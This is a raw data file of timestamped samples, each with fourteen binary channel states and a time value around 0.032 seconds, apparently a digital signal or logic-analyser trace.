1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055452e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055500e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055548e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055576e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055600e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055652e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055676e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,3.2055680e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2055684e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2055700e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2055724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055776e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055800e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055828e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055852e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055876e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055900e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055976e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056000e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056028e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056052e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056076e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056176e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056180e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2056228e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056252e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056260e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056276e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056300e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056376e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056400e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056404e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2056452e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056484e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056500e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056576e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056600e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056628e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056700e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056708e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2056724e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056748e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2056804e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2056828e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,3.2056832e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056852e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056876e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056900e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2056948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2056976e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057000e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057028e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057052e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057076e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057152e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057176e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057200e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057228e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057252e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057328e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057356e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057380e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057400e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057452e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057476e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057500e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057528e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057556e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057580e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057604e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057628e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2057632e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2057676e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2057704e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,3.2057708e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057712e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057728e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057752e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057780e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057804e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057852e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057876e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057928e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2057952e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2057980e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058004e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058028e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058052e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058100e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058128e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058152e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2058156e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2058204e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2058228e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058236e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058252e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058304e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058328e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058352e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058380e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058400e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058452e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058476e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058500e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058524e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2058532e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2058576e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2058600e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058608e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058628e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058652e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058776e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058800e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058852e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058876e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2058948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2058976e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059000e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059028e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059052e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059100e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,3.2059104e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2059108e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2059152e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2059176e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,3.2059180e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059184e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059200e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059228e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059252e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059376e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059400e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059452e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059476e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059500e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059576e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059600e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059628e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059652e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059676e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059748e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2059756e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2059776e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2059800e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059808e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059852e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059876e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2059948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2059976e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060000e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060028e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060052e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060100e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060128e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060152e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060180e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060204e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060228e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060252e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060276e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060300e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060328e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060352e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060380e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060404e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060428e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060452e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060500e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060528e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060552e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060580e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060604e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060628e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060652e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060728e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060752e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060780e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060804e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060828e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060852e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060876e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060928e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2060956e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2060980e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2061004e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2185668e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.2185828e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2185852e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,3.2185876e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2185896e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2186180e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2186204e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2186228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2186252e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2186276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2186300e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.2186352e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.2186376e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,3.2186380e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,3.2186404e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,3.2186428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186452e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186476e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186500e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186524e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2186532e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2186576e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2186604e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2186608e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186612e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186628e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186652e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186776e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186804e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186900e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186924e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2186948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2186976e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2186980e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2187028e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2187052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187060e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187100e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187128e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187176e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187200e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187252e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187300e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187328e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187376e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187400e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187552e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187576e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2187580e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2187604e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2187628e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2187632e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187636e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187676e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187728e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187752e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187776e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187804e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187828e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187900e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187924e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2187948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2187976e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188000e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188028e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188076e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188100e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188124e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188132e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2188176e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188204e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2188208e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188212e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188228e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188252e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188300e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188348e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188356e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2188404e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188428e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188452e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188476e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188500e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188576e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188604e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2188628e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188660e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188676e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188700e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188708e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2188752e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2188776e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188784e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188804e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188828e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188900e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2188924e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2188976e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189004e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189076e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189152e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189204e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189228e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189276e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189300e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189376e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189400e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189428e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189452e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189476e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189500e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189548e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189576e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189600e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189628e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189676e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2189680e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.2189724e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.2189752e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.2189756e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189760e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189776e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189800e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2189924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2189952e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190004e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190028e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190076e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190100e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190152e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.2190176e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.2190204e-02 